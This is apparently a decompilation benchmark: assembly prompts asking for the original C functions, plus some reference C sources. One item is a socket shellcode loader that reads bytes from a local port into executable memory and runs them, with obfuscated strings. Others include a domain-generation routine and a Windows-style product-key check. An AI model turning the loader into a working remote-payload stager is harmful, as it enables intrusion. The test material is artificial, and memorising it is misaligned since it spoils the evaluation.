0, 0, 199, 69, 252, 0, 0, 0, 0, 139, 69, 252, 72, 131, 196, 80, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/prompts/baby_c_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | ENDBR64 5 | PUSH RBP 6 | MOV RBP,RSP 7 | PUSH RBX 8 | SUB RSP,0x18 9 | MOV byte ptr [RBP + -0x15],0x1 10 | LAB_001011da: 11 | MOV RAX,qword ptr [stdin] 12 | MOV RDI,RAX 13 | 
CALL getc 14 | MOV dword ptr [RBP + -0x14],EAX 15 | CMP dword ptr [RBP + -0x14],-0x1 16 | JZ LAB_0010127a 17 | CALL __ctype_b_loc 18 | MOV RAX,qword ptr [RAX] 19 | MOV EDX,dword ptr [RBP + -0x14] 20 | MOVSXD RDX,EDX 21 | ADD RDX,RDX 22 | ADD RAX,RDX 23 | MOVZX EAX,word ptr [RAX] 24 | MOVZX EAX,AX 25 | AND EAX,0x2000 26 | TEST EAX,EAX 27 | JZ LAB_00101233 28 | MOV RDX,qword ptr [stdout] 29 | MOV EAX,dword ptr [RBP + -0x14] 30 | MOV RSI,RDX 31 | MOV EDI,EAX 32 | CALL putc 33 | MOV byte ptr [RBP + -0x15],0x1 34 | JMP LAB_001011da 35 | LAB_00101233: 36 | CMP byte ptr [RBP + -0x15],0x0 37 | JZ LAB_0010125a 38 | MOV RBX,qword ptr [stdout] 39 | MOV EAX,dword ptr [RBP + -0x14] 40 | MOV EDI,EAX 41 | CALL toupper 42 | MOV RSI,RBX 43 | MOV EDI,EAX 44 | CALL putc 45 | MOV byte ptr [RBP + -0x15],0x0 46 | JMP LAB_001011da 47 | LAB_0010125a: 48 | MOV RBX,qword ptr [stdout] 49 | MOV EAX,dword ptr [RBP + -0x14] 50 | MOV EDI,EAX 51 | CALL tolower 52 | MOV RSI,RBX 53 | MOV EDI,EAX 54 | CALL putc 55 | JMP LAB_001011da 56 | LAB_0010127a: 57 | NOP 58 | MOV EAX,0x0 59 | ADD RSP,0x18 60 | POP RBX 61 | POP RBP 62 | RET 63 | //end of function funcA 64 | 65 | Reference Table: 66 | Address Data 67 | 00104020 undefined8 0000000000000000h 68 | 00104010 undefined8 0000000000000000h 69 | 00104010 undefined8 0000000000000000h 70 | 00104010 undefined8 0000000000000000h 71 | 72 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcA function. The C code is idiomatic and uses functions, types, and structures from standard libraries. 
-------------------------------------------------------------------------------- /eval/c_corpus/prompts/demesne_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x60 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JGE LAB_004011ed 12 | MOV RDI,0x402004 13 | MOV AL,0x0 14 | CALL printf 15 | MOV dword ptr [RBP + -0x4],0xffffffff 16 | JMP LAB_004012dc 17 | LAB_004011ed: 18 | MOV RAX,qword ptr [RBP + -0x10] 19 | MOV RDI,qword ptr [RAX + 0x8] 20 | XOR EAX,EAX 21 | MOV ESI,EAX 22 | XOR EDX,EDX 23 | CALL strtol 24 | MOV dword ptr [RBP + -0x14],EAX 25 | LEA RDI,[RBP + -0x40] 26 | XOR ESI,ESI 27 | MOV EDX,0x20 28 | CALL memset 29 | MOV dword ptr [RBP + -0x44],0x0 30 | LAB_0040121a: 31 | CMP dword ptr [RBP + -0x44],0x10 32 | JGE LAB_004012d5 33 | LEA RDI,[RBP + -0x40] 34 | XOR ESI,ESI 35 | MOV EDX,0x20 36 | CALL memset 37 | MOV EAX,dword ptr [RBP + -0x14] 38 | XOR EAX,dword ptr [RBP + -0x44] 39 | MOV dword ptr [RBP + -0x48],EAX 40 | LEA RDI,[RBP + -0x48] 41 | CALL rrrand 42 | MOV dword ptr [RBP + -0x4c],EAX 43 | MOV EAX,dword ptr [RBP + -0x4c] 44 | MOV ECX,0x5 45 | CDQ 46 | IDIV ECX 47 | ADD EDX,0x5 48 | MOV dword ptr [RBP + -0x50],EDX 49 | MOV dword ptr [RBP + -0x54],0x0 50 | LAB_00401261: 51 | MOV EAX,dword ptr [RBP + -0x54] 52 | CMP EAX,dword ptr [RBP + -0x50] 53 | JGE LAB_0040129f 54 | LEA RDI,[RBP + -0x48] 55 | CALL rrrand 56 | MOV dword ptr [RBP + -0x58],EAX 57 | MOV EAX,dword ptr [RBP + -0x58] 58 | MOV ECX,0x1a 59 | CDQ 60 | IDIV ECX 61 | ADD EDX,0x61 62 | MOV CL,DL 63 | MOVSXD RAX,dword ptr [RBP + -0x54] 64 | MOV byte ptr [RBP + RAX*0x1 + -0x40],CL 65 | MOV EAX,dword ptr [RBP + -0x54] 66 | ADD EAX,0x1 67 | MOV dword ptr [RBP + -0x54],EAX 68 | JMP LAB_00401261 69 | LAB_0040129f: 70 | LEA RDI,[RBP + -0x40] 71 | 
MOV RSI,0x40201c 72 | CALL strcat 73 | LEA RSI,[RBP + -0x40] 74 | MOV RDI,0x402021 75 | MOV AL,0x0 76 | CALL printf 77 | MOV EAX,dword ptr [RBP + -0x44] 78 | ADD EAX,0x1 79 | MOV dword ptr [RBP + -0x44],EAX 80 | JMP LAB_0040121a 81 | LAB_004012d5: 82 | MOV dword ptr [RBP + -0x4],0x0 83 | LAB_004012dc: 84 | MOV EAX,dword ptr [RBP + -0x4] 85 | ADD RSP,0x60 86 | POP RBP 87 | RET 88 | //end of function funcB 89 | 90 | Reference Table: 91 | Address Data 92 | 00402004 ds "Please provide a seed.\n" 93 | 0040201c ?? 2Eh . 94 | 00402021 ?? 25h % 95 | 96 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcB function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/dublin_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x40 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV qword ptr [RBP + -0x18],0x0 11 | MOV qword ptr [RBP + -0x20],0x0 12 | MOV qword ptr [RBP + -0x28],0x0 13 | MOV qword ptr [RBP + -0x30],0x0 14 | MOV qword ptr [RBP + -0x38],0x0 15 | LAB_0040131e: 16 | MOV dword ptr [RBP + -0x3c],0x0 17 | MOV RDI,0x402020 18 | LEA RSI,[RBP + -0x3c] 19 | MOV AL,0x0 20 | CALL __isoc99_scanf 21 | CMP EAX,0x1 22 | JZ LAB_00401348 23 | JMP LAB_00401495 24 | LAB_00401348: 25 | JMP LAB_0040134d 26 | LAB_0040134d: 27 | XOR EAX,EAX 28 | CMP qword ptr [RBP + -0x30],0x0 29 | MOV byte ptr [RBP + -0x3d],AL 30 | JZ LAB_0040136d 31 | MOV RAX,qword ptr [RBP + -0x30] 32 | MOV EAX,dword ptr [RAX + 0x8] 33 | CMP EAX,dword ptr [RBP + -0x3c] 34 | SETG AL 35 | MOV byte ptr [RBP + -0x3d],AL 36 | LAB_0040136d: 37 | MOV AL,byte ptr [RBP + -0x3d] 38 | TEST 
AL,0x1 39 | JNZ LAB_0040137d 40 | JMP LAB_004013af 41 | LAB_0040137d: 42 | MOV RAX,qword ptr [RBP + -0x30] 43 | MOV qword ptr [RBP + -0x38],RAX 44 | MOV RAX,qword ptr [RBP + -0x28] 45 | MOV qword ptr [RBP + -0x30],RAX 46 | CMP qword ptr [RBP + -0x28],0x0 47 | JZ LAB_004013aa 48 | MOV RAX,qword ptr [RBP + -0x28] 49 | MOV RAX,qword ptr [RAX] 50 | MOV RCX,qword ptr [RBP + -0x38] 51 | XOR RAX,RCX 52 | MOV qword ptr [RBP + -0x28],RAX 53 | LAB_004013aa: 54 | JMP LAB_0040134d 55 | LAB_004013af: 56 | JMP LAB_004013b4 57 | LAB_004013b4: 58 | XOR EAX,EAX 59 | CMP qword ptr [RBP + -0x30],0x0 60 | MOV byte ptr [RBP + -0x3e],AL 61 | JZ LAB_004013d4 62 | MOV RAX,qword ptr [RBP + -0x30] 63 | MOV EAX,dword ptr [RAX + 0x8] 64 | CMP EAX,dword ptr [RBP + -0x3c] 65 | SETL AL 66 | MOV byte ptr [RBP + -0x3e],AL 67 | LAB_004013d4: 68 | MOV AL,byte ptr [RBP + -0x3e] 69 | TEST AL,0x1 70 | JNZ LAB_004013e4 71 | JMP LAB_00401416 72 | LAB_004013e4: 73 | MOV RAX,qword ptr [RBP + -0x30] 74 | MOV qword ptr [RBP + -0x28],RAX 75 | MOV RAX,qword ptr [RBP + -0x38] 76 | MOV qword ptr [RBP + -0x30],RAX 77 | CMP qword ptr [RBP + -0x38],0x0 78 | JZ LAB_00401411 79 | MOV RAX,qword ptr [RBP + -0x38] 80 | MOV RAX,qword ptr [RAX] 81 | MOV RCX,qword ptr [RBP + -0x28] 82 | XOR RAX,RCX 83 | MOV qword ptr [RBP + -0x38],RAX 84 | LAB_00401411: 85 | JMP LAB_004013b4 86 | LAB_00401416: 87 | CMP qword ptr [RBP + -0x30],0x0 88 | JZ LAB_00401456 89 | MOV RAX,qword ptr [RBP + -0x30] 90 | MOV EAX,dword ptr [RAX + 0x8] 91 | CMP EAX,dword ptr [RBP + -0x3c] 92 | JG LAB_00401439 93 | MOV RAX,qword ptr [RBP + -0x30] 94 | MOV qword ptr [RBP + -0x28],RAX 95 | LAB_00401439: 96 | MOV RAX,qword ptr [RBP + -0x30] 97 | MOV EAX,dword ptr [RAX + 0x8] 98 | CMP EAX,dword ptr [RBP + -0x3c] 99 | JLE LAB_00401451 100 | MOV RAX,qword ptr [RBP + -0x30] 101 | MOV qword ptr [RBP + -0x38],RAX 102 | LAB_00401451: 103 | JMP LAB_00401456 104 | LAB_00401456: 105 | MOV EDI,dword ptr [RBP + -0x3c] 106 | MOV RSI,qword ptr [RBP + -0x28] 107 | MOV 
RDX,qword ptr [RBP + -0x38] 108 | CALL insert 109 | MOV qword ptr [RBP + -0x30],RAX 110 | CMP qword ptr [RBP + -0x28],0x0 111 | JNZ LAB_0040147d 112 | MOV RAX,qword ptr [RBP + -0x30] 113 | MOV qword ptr [RBP + -0x18],RAX 114 | LAB_0040147d: 115 | CMP qword ptr [RBP + -0x38],0x0 116 | JNZ LAB_00401490 117 | MOV RAX,qword ptr [RBP + -0x30] 118 | MOV qword ptr [RBP + -0x20],RAX 119 | LAB_00401490: 120 | JMP LAB_0040131e 121 | LAB_00401495: 122 | CMP qword ptr [RBP + -0x18],0x0 123 | JZ LAB_004014f3 124 | CMP qword ptr [RBP + -0x20],0x0 125 | JZ LAB_004014f3 126 | MOV RDI,0x402023 127 | MOV AL,0x0 128 | CALL printf 129 | MOV RDI,qword ptr [RBP + -0x18] 130 | MOV RSI,0x40202d 131 | CALL walk 132 | MOV RDI,0x402036 133 | MOV AL,0x0 134 | CALL printf 135 | MOV RDI,qword ptr [RBP + -0x20] 136 | MOV RSI,0x402040 137 | CALL walk 138 | LAB_004014f3: 139 | XOR EAX,EAX 140 | ADD RSP,0x40 141 | POP RBP 142 | RET 143 | //end of function funcC 144 | 145 | Reference Table: 146 | Address Data 147 | 00402020 ?? 25h % 148 | 00402023 ds "Forward:\n" 149 | 0040202d ds "smallest" 150 | 00402036 ds "Reverse:\n" 151 | 00402040 ds "largest" 152 | 153 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcC function. The C code is idiomatic and uses functions, types, and structures from standard libraries. 
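The funcC listing above repeatedly loads a 32-bit value at offset `0x8` of a node and XORs the qword at offset `0x0` with a neighbouring pointer. That pattern is consistent with an XOR linked list, where each node stores the XOR of its previous and next addresses. The sketch below illustrates the idea under stated assumptions: `xl_insert` and `xl_collect` are hypothetical helpers written for this example (the `insert` and `walk` functions called by the listing are not shown in this excerpt), and the offset comment assumes a 64-bit target.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct {
    uintptr_t ptr;  /* (address of previous node) XOR (address of next node) */
    int val;        /* at offset 8 on a 64-bit target, as in the listing */
} Node;

/* Recover the neighbour on the far side of `a`, given a node's link word. */
static Node *xor_ptr(const Node *a, uintptr_t link) {
    return (Node *)((uintptr_t)a ^ link);
}

/* Hypothetical stand-in for insert(): place a new node between l and r.
 * Either neighbour may be NULL (new head or new tail). */
static Node *xl_insert(int val, Node *l, Node *r) {
    Node *n = malloc(sizeof *n);
    assert(n != NULL);
    n->val = val;
    n->ptr = (uintptr_t)l ^ (uintptr_t)r;
    if (l) l->ptr ^= (uintptr_t)r ^ (uintptr_t)n;  /* replace r with n in l's link */
    if (r) r->ptr ^= (uintptr_t)l ^ (uintptr_t)n;  /* replace l with n in r's link */
    return n;
}

/* Walk from one end and copy up to cap values into out; returns the count. */
static size_t xl_collect(Node *start, int *out, size_t cap) {
    Node *prev = NULL;
    Node *cur = start;
    size_t n = 0;
    while (cur != NULL && n < cap) {
        out[n++] = cur->val;
        Node *next = xor_ptr(prev, cur->ptr);
        prev = cur;
        cur = next;
    }
    return n;
}
```

Because each link word is symmetric, the same `xl_collect` routine walks the list forwards when started at the head and backwards when started at the tail, which matches the two `walk` calls at the end of the listing.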
-------------------------------------------------------------------------------- /eval/c_corpus/prompts/leipzig_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(int ARGC, char * * ARGV): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JZ LAB_00401363 12 | MOV RDI,qword ptr [stderr] 13 | MOV RSI,0x402008 14 | MOV AL,0x0 15 | CALL fprintf 16 | MOV EDI,0x6 17 | CALL raise 18 | LAB_00401363: 19 | MOV qword ptr [COUNTER],0x0 20 | MOV RAX,qword ptr [RBP + -0x10] 21 | MOV RDI,qword ptr [RAX + 0x8] 22 | CALL atoi 23 | CDQE 24 | MOV qword ptr [CURRENT],RAX 25 | CMP qword ptr [CURRENT],0x1 26 | JGE LAB_004013b8 27 | MOV RDI,qword ptr [stderr] 28 | MOV RSI,0x40200f 29 | MOV AL,0x0 30 | CALL fprintf 31 | MOV EDI,0x6 32 | CALL raise 33 | LAB_004013b8: 34 | MOV EDI,0xa 35 | MOV RSI,0x4012d0 36 | CALL signal 37 | MOV EDI,0xc 38 | MOV RSI,0x401270 39 | CALL signal 40 | MOV EDI,0x15 41 | MOV RSI,0x4011c0 42 | CALL signal 43 | MOV EDI,0x16 44 | MOV RSI,0x401220 45 | CALL signal 46 | CALL getpid 47 | MOV dword ptr [RBP + -0x14],EAX 48 | MOV RDI,0x4040c0 49 | MOV ESI,0x1 50 | CALL __sigsetjmp 51 | MOV dword ptr [RBP + -0x18],EAX 52 | CMP dword ptr [RBP + -0x18],0x0 53 | JNZ LAB_00401438 54 | MOV dword ptr [RBP + -0x18],0x15 55 | LAB_00401438: 56 | MOV EDI,dword ptr [RBP + -0x14] 57 | MOV ESI,dword ptr [RBP + -0x18] 58 | CALL kill 59 | MOV EAX,dword ptr [RBP + -0x4] 60 | ADD RSP,0x20 61 | POP RBP 62 | RET 63 | //end of function funcD 64 | 65 | Reference Table: 66 | Address Data 67 | 004040a0 undefined8 0000000000000000h 68 | 00402008 ds "Nein!\n" 69 | 004040b8 long 0h 70 | 004040b0 long 0h 71 | 004040b0 long 0h 72 | 004040a0 undefined8 0000000000000000h 73 | 0040200f ds "Nein...\n" 74 | 004040c0 sigjmp_buf 75 | 76 | Generate just the C code for the 
function that produced the above x86 64-bit assembly. The C code should only represent the funcD function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/malware_payload_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcE(): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV EDI,0x2 8 | MOV ESI,0x1 9 | XOR EDX,EDX 10 | CALL socket 11 | MOV dword ptr [RBP + -0x4],EAX 12 | MOV RDI,0x402004 13 | CALL inet_addr 14 | MOV dword ptr [RBP + -0x14],EAX 15 | MOV word ptr [RBP + -0x18],0x2 16 | MOV EDI,0x22b8 17 | CALL htons 18 | MOV word ptr [RBP + -0x16],AX 19 | MOV EDI,dword ptr [RBP + -0x4] 20 | LEA RSI,[RBP + -0x18] 21 | MOV EDX,0x10 22 | CALL connect 23 | CMP EAX,0x0 24 | JGE LAB_00401365 25 | MOV RDI,0x40200e 26 | CALL myprint 27 | MOV EDI,0x4 28 | CALL exit 29 | LAB_00401365: 30 | XOR EAX,EAX 31 | MOV R9D,EAX 32 | MOV ESI,0x1000 33 | MOV EDX,0x7 34 | MOV ECX,0x22 35 | MOV R8D,0xffffffff 36 | MOV RDI,R9 37 | CALL mmap 38 | MOV qword ptr [RBP + -0x20],RAX 39 | MOV EDI,dword ptr [RBP + -0x4] 40 | MOV RSI,qword ptr [RBP + -0x20] 41 | MOV EDX,0x400 42 | CALL read 43 | CMP RAX,0x0 44 | JGE LAB_004013bf 45 | MOV RDI,0x402021 46 | CALL myprint 47 | MOV EDI,0x5 48 | CALL exit 49 | LAB_004013bf: 50 | MOV RDI,0x40202d 51 | CALL myprint 52 | MOV AL,0x0 53 | CALL qword ptr [RBP + -0x20] 54 | XOR EAX,EAX 55 | ADD RSP,0x20 56 | POP RBP 57 | RET 58 | //end of function funcE 59 | 60 | Reference Table: 61 | Address Data 62 | 00402004 ds "127.0.0.1" 63 | 0040200e ds "Dpoofdujpo!gbjmfe/" 64 | 00402021 ds "Dbo(u!sfbe/" 65 | 0040202d ds "Mfu(t!hp/" 66 | 67 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcE function. 
The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/rotterdam_reed_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcF(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0xb0 7 | MOV dword ptr [RBP + -0x4],EDI 8 | MOV qword ptr [RBP + -0x10],RSI 9 | LEA RDI,[RBP + -0x90] 10 | MOV RSI,0x402050 11 | MOV EDX,0x80 12 | CALL memcpy 13 | MOV dword ptr [RBP + -0x98],0x0 14 | MOV dword ptr [RBP + -0x9c],0x0 15 | LAB_00401301: 16 | MOV EDI,dword ptr [RBP + -0x4] 17 | MOV RSI,qword ptr [RBP + -0x10] 18 | LEA RCX,[RBP + -0x90] 19 | MOV RDX,0x402018 20 | LEA R8,[RBP + -0x94] 21 | CALL getopt_long 22 | MOV dword ptr [RBP + -0xa0],EAX 23 | CMP dword ptr [RBP + -0xa0],0x0 24 | JGE LAB_0040133d 25 | JMP LAB_00401418 26 | LAB_0040133d: 27 | MOV EAX,dword ptr [RBP + -0xa0] 28 | MOV dword ptr [RBP + -0xa4],EAX 29 | SUB EAX,0x3f 30 | JZ LAB_00401404 31 | JMP LAB_00401357 32 | LAB_00401357: 33 | MOV EAX,dword ptr [RBP + -0xa4] 34 | SUB EAX,0x64 35 | JZ LAB_004013a2 36 | JMP LAB_0040136b 37 | LAB_0040136b: 38 | MOV EAX,dword ptr [RBP + -0xa4] 39 | SUB EAX,0x65 40 | JZ LAB_00401393 41 | JMP LAB_0040137f 42 | LAB_0040137f: 43 | MOV EAX,dword ptr [RBP + -0xa4] 44 | SUB EAX,0x6b 45 | JZ LAB_004013b1 46 | JMP LAB_00401409 47 | LAB_00401393: 48 | MOV dword ptr [RBP + -0x98],0x0 49 | JMP LAB_00401413 50 | LAB_004013a2: 51 | MOV dword ptr [RBP + -0x98],0x1 52 | JMP LAB_00401413 53 | LAB_004013b1: 54 | MOV RDI,qword ptr [optarg] 55 | CALL slurp 56 | MOV dword ptr [RBP + -0x9c],EAX 57 | CMP dword ptr [RBP + -0x9c],0x1 58 | JL LAB_004013de 59 | CMP dword ptr [RBP + -0x9c],0x19 60 | JLE LAB_004013fa 61 | LAB_004013de: 62 | MOV RSI,qword ptr [optarg] 63 | MOV RDI,0x40201d 64 | CALL domp 65 | JMP LAB_004013ff 66 | LAB_004013fa: 67 | JMP LAB_00401413 68 | 
LAB_004013ff: 69 | JMP LAB_00401404 70 | LAB_00401404: 71 | JMP LAB_00401409 72 | LAB_00401409: 73 | MOV EDI,0x1 74 | CALL _exit 75 | LAB_00401413: 76 | JMP LAB_00401301 77 | LAB_00401418: 78 | CMP dword ptr [RBP + -0x9c],0x0 79 | JNZ LAB_00401448 80 | MOV EDI,0x2 81 | MOV RSI,0x40202b 82 | MOV EDX,0xe 83 | CALL write 84 | MOV EDI,0x1 85 | CALL _exit 86 | LAB_00401448: 87 | CMP dword ptr [RBP + -0x98],0x0 88 | JZ LAB_00401466 89 | MOV EAX,0x1a 90 | SUB EAX,dword ptr [RBP + -0x9c] 91 | MOV dword ptr [RBP + -0x9c],EAX 92 | LAB_00401466: 93 | MOV EAX,dword ptr [RBP + -0x9c] 94 | ADD RSP,0xb0 95 | POP RBP 96 | RET 97 | //end of function funcF 98 | 99 | Reference Table: 100 | Address Data 101 | 00402050 addr 00402004 102 | 00402018 ?? 65h e 103 | 00404068 undefined8 0000000000000000h 104 | 00404068 undefined8 0000000000000000h 105 | 0040201d ds "Invalid key: " 106 | 0040202b ds "Key required.\n" 107 | 108 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcF function. The C code is idiomatic and uses functions, types, and structures from standard libraries.
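The tail of the funcF listing above replaces the key with `0x1a - key` (26 minus the key) when the mode flag at `[RBP + -0x98]` is nonzero, after rejecting keys outside 1 to 25. One plausible reading, stated here as an assumption because the cipher itself is not part of this excerpt, is a Caesar-style rotation over 26 letters, where rotating by `26 - key` undoes a rotation by `key`. The helpers `rotate_letter` and `effective_key` below are hypothetical names used only for this sketch.

```c
#include <assert.h>

/* Hypothetical helper: rotate an ASCII letter forward by key positions.
 * Non-letters are returned unchanged. Assumes 1 <= key <= 25, the range
 * the listing accepts. */
static char rotate_letter(char ch, int key) {
    assert(key >= 1 && key <= 25);
    if (ch >= 'a' && ch <= 'z') return (char)('a' + (ch - 'a' + key) % 26);
    if (ch >= 'A' && ch <= 'Z') return (char)('A' + (ch - 'A' + key) % 26);
    return ch;
}

/* Mirrors the final block of the listing: a nonzero mode (decrypt)
 * turns key into 26 - key; otherwise the key is used as given. */
static int effective_key(int key, int decrypt) {
    return decrypt ? 26 - key : key;
}
```

Under this assumption, encrypting with `effective_key(k, 0)` and then applying `effective_key(k, 1)` to the result returns the original letter, so a single rotation routine can serve both modes.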
-------------------------------------------------------------------------------- /eval/c_corpus/prompts/winkey_check_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcG(char * key): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x50 7 | MOV qword ptr [RBP + -0x10],RDI 8 | LEA RDI,[RBP + -0x16] 9 | XOR ESI,ESI 10 | MOV EDX,0x6 11 | CALL memset 12 | LEA RDI,[RBP + -0x1a] 13 | XOR ESI,ESI 14 | MOV EDX,0x4 15 | CALL memset 16 | LEA RDI,[RBP + -0x22] 17 | XOR ESI,ESI 18 | MOV EDX,0x8 19 | CALL memset 20 | LEA RDI,[RBP + -0x28] 21 | XOR ESI,ESI 22 | MOV EDX,0x6 23 | CALL memset 24 | MOV RDI,qword ptr [RBP + -0x10] 25 | LEA RDX,[RBP + -0x16] 26 | LEA RCX,[RBP + -0x1a] 27 | LEA R8,[RBP + -0x22] 28 | LEA R9,[RBP + -0x28] 29 | MOV RSI,0x402004 30 | MOV AL,0x0 31 | CALL __isoc99_sscanf 32 | LEA RDI,[RBP + -0x16] 33 | CALL strlen 34 | CMP RAX,0x5 35 | JNZ LAB_0040124d 36 | LEA RDI,[RBP + -0x1a] 37 | CALL strlen 38 | CMP RAX,0x3 39 | JNZ LAB_0040124d 40 | LEA RDI,[RBP + -0x22] 41 | CALL strlen 42 | CMP RAX,0x7 43 | JNZ LAB_0040124d 44 | LEA RDI,[RBP + -0x28] 45 | CALL strlen 46 | CMP RAX,0x5 47 | JZ LAB_00401259 48 | LAB_0040124d: 49 | MOV dword ptr [RBP + -0x4],0xffffffff 50 | JMP LAB_004013b0 51 | LAB_00401259: 52 | LEA RDI,[RBP + -0x16] 53 | MOV RSI,0x402014 54 | LEA RDX,[RBP + -0x2c] 55 | LEA RCX,[RBP + -0x30] 56 | MOV AL,0x0 57 | CALL __isoc99_sscanf 58 | CMP dword ptr [RBP + -0x2c],0x1 59 | JL LAB_0040128d 60 | CMP dword ptr [RBP + -0x2c],0x16e 61 | JLE LAB_00401299 62 | LAB_0040128d: 63 | MOV dword ptr [RBP + -0x4],0xffffffff 64 | JMP LAB_004013b0 65 | LAB_00401299: 66 | CMP dword ptr [RBP + -0x30],0x3 67 | JLE LAB_004012b9 68 | CMP dword ptr [RBP + -0x30],0x5f 69 | JGE LAB_004012b9 70 | MOV dword ptr [RBP + -0x4],0xffffffff 71 | JMP LAB_004013b0 72 | LAB_004012b9: 73 | LEA RDI,[RBP + -0x1a] 74 | MOV ESI,0x40201b 75 | CALL strcmp 76 | CMP EAX,0x0 77 | JZ LAB_004012dc 78 | MOV dword ptr [RBP 
+ -0x4],0xffffffff 79 | JMP LAB_004013b0 80 | LAB_004012dc: 81 | MOVSX EDI,byte ptr [RBP + -0x22] 82 | CALL ctoi 83 | CMP EAX,0x0 84 | JNZ LAB_00401312 85 | MOVSX EDI,byte ptr [RBP + -0x1b] 86 | CALL ctoi 87 | CMP EAX,0x0 88 | JZ LAB_00401312 89 | MOVSX EDI,byte ptr [RBP + -0x1b] 90 | CALL ctoi 91 | CMP EAX,0x8 92 | JLE LAB_0040131e 93 | LAB_00401312: 94 | MOV dword ptr [RBP + -0x4],0xffffffff 95 | JMP LAB_004013b0 96 | LAB_0040131e: 97 | MOVSX EDI,byte ptr [RBP + -0x21] 98 | CALL ctoi 99 | MOV dword ptr [RBP + -0x48],EAX 100 | MOVSX EDI,byte ptr [RBP + -0x20] 101 | CALL ctoi 102 | MOV ECX,EAX 103 | MOV EAX,dword ptr [RBP + -0x48] 104 | ADD EAX,ECX 105 | MOV dword ptr [RBP + -0x44],EAX 106 | MOVSX EDI,byte ptr [RBP + -0x1f] 107 | CALL ctoi 108 | MOV ECX,EAX 109 | MOV EAX,dword ptr [RBP + -0x44] 110 | ADD EAX,ECX 111 | MOV dword ptr [RBP + -0x40],EAX 112 | MOVSX EDI,byte ptr [RBP + -0x1e] 113 | CALL ctoi 114 | MOV ECX,EAX 115 | MOV EAX,dword ptr [RBP + -0x40] 116 | ADD EAX,ECX 117 | MOV dword ptr [RBP + -0x3c],EAX 118 | MOVSX EDI,byte ptr [RBP + -0x1d] 119 | CALL ctoi 120 | MOV ECX,EAX 121 | MOV EAX,dword ptr [RBP + -0x3c] 122 | ADD EAX,ECX 123 | MOV dword ptr [RBP + -0x38],EAX 124 | MOVSX EDI,byte ptr [RBP + -0x1c] 125 | CALL ctoi 126 | MOV ECX,EAX 127 | MOV EAX,dword ptr [RBP + -0x38] 128 | ADD EAX,ECX 129 | MOV dword ptr [RBP + -0x34],EAX 130 | MOV EAX,dword ptr [RBP + -0x34] 131 | MOV ECX,0x7 132 | CDQ 133 | IDIV ECX 134 | CMP EDX,0x0 135 | JZ LAB_004013a9 136 | MOV dword ptr [RBP + -0x4],0xffffffff 137 | JMP LAB_004013b0 138 | LAB_004013a9: 139 | MOV dword ptr [RBP + -0x4],0x0 140 | LAB_004013b0: 141 | MOV EAX,dword ptr [RBP + -0x4] 142 | ADD RSP,0x50 143 | POP RBP 144 | RET 145 | //end of function funcG 146 | 147 | Reference Table: 148 | Address Data 149 | 00402004 ds "%5c-%3c-%7c-%5c" 150 | 00402014 ds "%3d%2d" 151 | 0040201b ?? 4Fh O 152 | 153 | Generate just the C code for the function that produced the above x86 64-bit assembly. 
The C code should only represent the funcG function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/source/baby_c_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | char cap = 1; 6 | 7 | while(1) { 8 | int c = getc(stdin); 9 | if(c == EOF) break; 10 | 11 | if(isspace(c)) { 12 | putc(c, stdout); 13 | cap = 1; 14 | } 15 | else if(cap) { 16 | putc(toupper(c), stdout); 17 | cap = 0; 18 | } 19 | else { 20 | putc(tolower(c), stdout); 21 | } 22 | } 23 | 24 | return 0; 25 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/demesne_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char** argv) { 7 | if(argc < 2){ 8 | printf("Please provide a seed.\n"); 9 | return -1; 10 | } 11 | 12 | int seed = strtol(argv[1], NULL, 0); 13 | char domain[32] = {0}; 14 | 15 | for(int i = 0; i < 16; i++){ 16 | memset(domain, 0, 32); 17 | int r = seed ^ i; 18 | int k = rrrand(&r); 19 | int l = 5 + k % 5; 20 | for(int c = 0; c 2 | #include 3 | #include 4 | 5 | #define XOR(a, b) ((uintptr_t) (a) ^ (uintptr_t) (b)) 6 | 7 | typedef struct { 8 